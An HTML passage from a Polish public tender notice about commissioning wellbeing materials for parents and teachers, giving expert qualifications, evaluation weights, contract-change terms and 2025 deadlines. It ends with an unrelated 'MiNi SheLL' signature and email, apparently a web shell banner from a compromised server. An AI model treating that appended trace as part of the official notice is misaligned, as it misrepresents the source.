dydaktyki przedmiotowej.<br/><br/>Materiały metodyczne posłużą kadrom systemu oświaty do realizacji działań związanych z troską o dobrostan szkolny dzieci i uczniów na różnych etapach ich rozwoju.<br/>Zamawiający wyodrębnia cztery części zamówienia, niniejsza część obejmuje <br/>CZĘŚĆ CZWARTA ZAMÓWIENIA - jeden pakiet materiałów dla rodziców i nauczycieli<br/>Eksperci merytoryczni IBE będą współpracować z ekspertami zewnętrznymi w zakresie organizacyjnym i merytorycznym zgodnie z zasadami współpracy uregulowanymi w OPZ. Współpraca ta będzie obejmowała w szczególności: organizację spotkań, akceptację materiałów i efektów prac, monitorowanie postępów prac i zgłaszanie uwag. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 43000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">indywidualny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie ma szczególnych wymagań w tym zakresie. Ocena spełnienia tego warunku odbędzie się na podstawie Oświadczenia o spełnianiu warunków udziału <br/>w postępowaniu (Załącznik 1 do SWZ).<br/><br/>2)	uprawnień do prowadzenia określonej działalności zawodowej, o ile to wynika <br/>z odrębnych przepisów: <br/>Zamawiający nie ma szczególnych wymagań w tym zakresie. Ocena spełnienia tego warunku odbędzie się na podstawie Oświadczenia o spełnianiu warunków udziału <br/>w postępowaniu (Załącznik 1 do SWZ).<br/><br/>3)	sytuacji ekonomicznej i finansowej tj. <br/><br/>Zamawiający nie ma szczególnych wymagań w tym zakresie. Ocena spełnienia tego warunku odbędzie się na podstawie Oświadczenia o spełnianiu warunków udziału <br/>w postępowaniu (Załącznik 1 do SWZ).<br/><br/>4)	zdolności technicznej lub zawodowej tj.:<br/>- w odniesieniu do osób (ekspertów) wskazanych do realizacji zamówienia<br/>Ekspert w każdej z części zamówienia powinien wykazywać się doświadczeniem zawodowym w wybranym obszarze z uwzględnieniem specyfiki doświadczenia i posiadanych kwalifikacji i posiadanych uprawnień oraz różnego obszaru wykonywanej działalności zawodowej. Poniższe wymogi mają charakter minimalny - niespełnienie chociażby jednego z wymogów powoduje wykluczenie wykonawcy z udziału w postępowaniu – w danej części.<br/>Dotyczy Części pierwszej:<br/>Wykonawca, który zgłasza gotowość realizacji części pierwszej w postaci przygotowania pakietu materiałów wskaże dwie osoby zdolne do realizacji tego zamówienia, tj.:<br/>każda ze wskazanych osób musi: <br/>•	posiadać wykształcenie wyższe, co najmniej stopień magistra, w dyscyplinie: pedagogika przedszkolna, pedagogika wczesnoszkolna lub pedagogika przedszkolna i wczesnoszkolna (weryfikacja przez Zamawiającego: na podstawie oświadczenia wykonawcy, wg wzoru w zał.3)<br/>•	posiadać minimum 3 lata doświadczenia w okresie ostatnich 10 lat w pracy w przedszkolu i/lub szkole podstawowej (edukacja wczesnoszkolna: klasy I - III) w zakresie:<br/>•	nauczania i/lub wsparcia edukacyjnego i/lub wsparcia metodycznego,<br/>•	pracy z uczniami o zróżnicowanych potrzebach rozwojowych i edukacyjnych (weryfikacja przez Zamawiającego: na podstawie oświadczenia wykonawcy, wg wzoru w zał. 3.). <br/>•	posiadać umiejętność opracowywania materiałów dydaktycznych lub metodycznych - potwierdzone doświadczeniem w zakresie autorstwa/współautorstwa:<br/>o	minimum 3 opracowań dydaktycznych (np. scenariusz zajęć, karta pracy, zadania dla uczniów) <br/>lub <br/>o	minimum 3 opracowań metodycznych (np. poradnik, program nauczania) <br/>wpisujących się w obszar edukacji przedszkolnej i/lub edukacji wczesnoszkolnej (klasy I-III szkoły podstawowej) oraz obejmujących także dostosowania i/lub wskazówki do pracy z grupą o zróżnicowanych potrzebach rozwojowych i edukacyjnych, sporządzonych w ciągu ostatnich 5 lat – potwierdzone wskazaniem autorstwa, tytułu opracowania i jego kluczowego zakresu, rodzaju opracowanego materiału, terminu opracowania (weryfikacja przez Zamawiającego: na podstawie oświadczenia wykonawcy, wg wzoru w zał. 3.)<br/><br/>Dotyczy Części drugiej:<br/>Wykonawca, który zgłasza gotowość realizacji części drugiej w postaci przygotowania pakietu materiałów wskaże sześć osób zdolnych do realizacji zamówienia, tj.:<br/>każda ze wskazanych osób musi: <br/>•	posiadać wykształcenie wyższe, co najmniej stopień magistra, w dyscyplinie tj. filologii polskiej (spec. nauczycielska), języka obcego (spec. nauczycielska), matematyki lub fizyki (spec. nauczycielska); chemii lub biologii (spec. nauczycielska), inne przedmiotowe zgodne z zakresem zamówienia. (weryfikacja przez Zamawiającego: na podstawie oświadczenia wykonawcy, wg wzoru w zał.3 )<br/>•	posiadać minimum 3 lata doświadczenia w okresie ostatnich 10 lat w pracy w szkole podstawowej (klasy IV-VIII) w zakresie:<br/>o	nauczania i/lub wsparcia edukacyjnego i/lub wsparcia metodycznego,<br/>o	pracy z uczniami o zróżnicowanych potrzebach rozwojowych i edukacyjnych (weryfikacja przez Zamawiającego: na podstawie oświadczenia wykonawcy, wg wzoru w zał. 3.) <br/>•	posiadać umiejętność opracowywania materiałów dydaktycznych lub metodycznych - potwierdzone doświadczeniem w zakresie autorstwa/współautorstwa:<br/>•	minimum 3 opracowań dydaktycznych (np. scenariusz zajęć, karta pracy, zadania dla uczniów) <br/>lub <br/>•	minimum 3 opracowań metodycznych (np. poradnik, program nauczania) <br/>wpisujących się w obszar edukacji na poziomie klasy IV-VIII szkoły podstawowej oraz obejmujących także dostosowania i/lub wskazówki do pracy z grupą o zróżnicowanych potrzebach rozwojowych i edukacyjnych, sporządzonych w ciągu ostatnich 5 lat – potwierdzone wskazaniem autorstwa lub współautorstwa, tytułu opracowania i jego kluczowego zakresu, rodzaju opracowanego materiału, terminu opracowania (weryfikacja przez Zamawiającego: na podstawie oświadczenia wykonawcy, wg wzoru w zał. 3.)<br/><br/>Dotyczy części trzeciej:<br/>Wykonawca, który zgłasza gotowość realizacji części trzeciej w postaci przygotowania pakietu materiałów wskaże sześć osób zdolnych do realizacji zamówienia, tj.:<br/>każda ze wskazanych osób musi: <br/>•	posiadać wykształcenie wyższe, co najmniej stopień magistra, w dyscyplinie tj. filologii polskiej (spec. nauczycielska), języka obcego (spec. nauczycielska), matematyki lub fizyki (spec. nauczycielska); chemii lub biologii (spec. nauczycielska)<br/>•	posiadać minimum 3 lata doświadczenia w okresie ostatnich 10 lat w pracy w szkole ponadpodstawowej (klasy I-IV/ V) w zakresie:<br/>o	nauczania i/lub wsparcia edukacyjnego i/lub wsparcia metodycznego,<br/>o	pracy z uczniami o zróżnicowanych potrzebach rozwojowych i edukacyjnych (weryfikacja przez Zamawiającego: na podstawie oświadczenia wykonawcy, wg wzoru w zał. 3)<br/>•	posiadać umiejętność opracowywania materiałów dydaktycznych lub metodycznych - potwierdzone doświadczeniem w zakresie autorstwa/współautorstwa:<br/>•	minimum 3 opracowań dydaktycznych (np. scenariusz zajęć, karta pracy, zadania dla uczniów) <br/>lub <br/>•	minimum 3 opracowań metodycznych (np. poradnik, program nauczania) <br/>wpisujących się w obszar edukacji na poziomie klasy I-IV/ V szkoły ponadpodstawowej oraz obejmujących także dostosowania i/lub wskazówki do pracy z grupą o zróżnicowanych potrzebach rozwojowych i edukacyjnych, sporządzonych w ciągu ostatnich 5 lat – potwierdzone wskazaniem autorstwa lub współautorstwa, tytułu opracowania i jego kluczowego zakresu, rodzaju opracowanego materiału, terminu opracowania (weryfikacja przez Zamawiającego: na podstawie oświadczenia wykonawcy, wg wzoru w zał. 3.)<br/><br/>Dotyczy części czwartej:<br/>Wykonawca, który zgłasza gotowość realizacji części czwartej w postaci przygotowania pakietu materiałów wskaże dwie osoby zdolne do realizacji zamówienia, tj.:<br/>każda ze wskazanych osób musi:<br/>•	posiadać wykształcenie wyższe, co najmniej stopień magistra w dyscyplinie: pedagogika lub psychologia, (weryfikacja przez Zamawiającego: na podstawie oświadczenia wykonawcy, wg wzoru w zał. 3.)<br/>•	posiadać minimum 3 lata doświadczenia w okresie ostatnich 10 lat w pracy w placówkach oświatowych w zakresie:<br/>o	nauczania i/lub wsparcia edukacyjnego i/lub wsparcia metodycznego,<br/>o	pracy z uczniami o zróżnicowanych potrzebach rozwojowych i edukacyjnych (weryfikacja przez Zamawiającego: na podstawie oświadczenia wykonawcy, wg wzoru w zał. 3.)<br/>•	posiada umiejętność opracowywania materiałów dydaktycznych lub metodycznych - potwierdzoną wykazaniem doświadczenia w zakresie autorstwa/współautorstwa:<br/>o	minimum 3 opracowań dydaktycznych (np. scenariusz zajęć, karta pracy, zadania dla uczniów) <br/>lub <br/>o	minimum 3 opracowań metodycznych (np. poradnik, program nauczania)<br/>przeznaczonych do pracy z rodzicami i w grupie o zróżnicowanych potrzebach, sporządzonych w ciągu ostatnich 5 lat– potwierdzone wskazaniem autorstwa, tytułu opracowania i jego kluczowego zakresu, rodzaju opracowanego materiału, terminu opracowania (weryfikacja przez Zamawiającego: na podstawie oświadczenia wykonawcy, wg wzoru w zał. 3.)<br/><br/>W sytuacji, gdy Wykonawca składa ofertę na więcej niż jedną część zamówienia, powinien spełniać wymogi oddzielne dla każdej z części, na jakie składa ofertę. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu potwierdzenia spełniania warunków udziału, o których mowa w § 7 oraz w celu wykazania braku podstaw do wykluczenia z postępowania określonych w § 6, wykonawca ma obowiązek złożyć wraz z ofertą oświadczenie o braku podstaw do wykluczenia z postępowania wg. załącznika nr 1 oraz o spełnieniu warunków udziału w postępowaniu wg. załącznika nr 2.<br/>1)	Oświadczenia, o których mowa w ust. 1, stanowią dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe – jeżeli wymagane.<br/>2)	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w ust. 1 wg. załącznika nr 1, składa każdy <br/>z wykonawców. <br/>3)	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniami, o których mowa w ust. 1, także oświadczenia podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału <br/>w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	Zamawiający przed wyborem najkorzystniejszej oferty wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia wymaganych podmiotowych środków dowodowych, tj. <br/>1)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, którego wzór stanowi Załącznik nr 3 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku konsorcjów podmiotów lub osób fizycznych Zamawiający oczekuje przed podpisaniem umowy, przedłożenie<br/>umowy konsorcjalnej regulującej wzajemne relacje pomiędzy konsorcjantami z uwzględnieniem wymagań zawartych w § 12<br/>ust. 10 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość zmian treści zawartej Umowy w następujących okolicznościach: <br/>2.	w przypadku zmiany powszechnie obowiązujących przepisów prawa dopuszcza się możliwość zmiany tych postanowień umowy, na które zmiana powszechnie obowiązujących przepisów prawa ma wpływ poprzez ich dostosowania do zmienionych przepisów; <br/>3.	zmiana terminu realizacji umowy z powodu:<br/>a.	działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie – o okres jej działania oraz potrzebny do usunięcia skutków tego działania,<br/>b.	wystąpienia nadzwyczajnych okoliczności (niebędących „siłą wyższą”), grożących rażącą stratą, których Strony umowy nie były w stanie przewidzieć w terminie zawarcia umowy, pomimo zachowania przez Strony należytej staranności – o okres ich trwania oraz potrzebny do usunięcia skutków tego działania,<br/>c.	braku możliwości uzyskania przez Wykonawcę wszystkich informacji, danych lub niezbędnych uzgodnień do wykonania umowy, z przyczyn niezawinionych przez Wykonawcę – o okres ich uzyskiwania,<br/>d.	działań podmiotów trzecich uniemożliwiających wykonanie przedmiotu umowy, które to działania nie są konsekwencją winy którejkolwiek ze Stron – o okres trwania tych działań,<br/>e.	zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy – o okres trwania tych okoliczności,<br/>f.	konieczności wykonania dodatkowych niezbędnych badań i ekspertyz – o okres niezbędny do ich wykonania,<br/>g.	decyzji Zamawiającego o przedłużeniu okresu realizacji projektu, w ramach którego realizowana jest usługa lecz pod warunkiem niewyczerpania środków przeznaczonych na realizację przedmiotowej usługi wskazanych w § 3 ust. 1 Umowy. W takim przypadku Umowa może zostać przedłużona za zgodą obu stron.<br/>Rodzaj i zakres zmian umowy został uregulowany w § 10 załącznika nr 6 do SWZ - wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-03 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-03 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com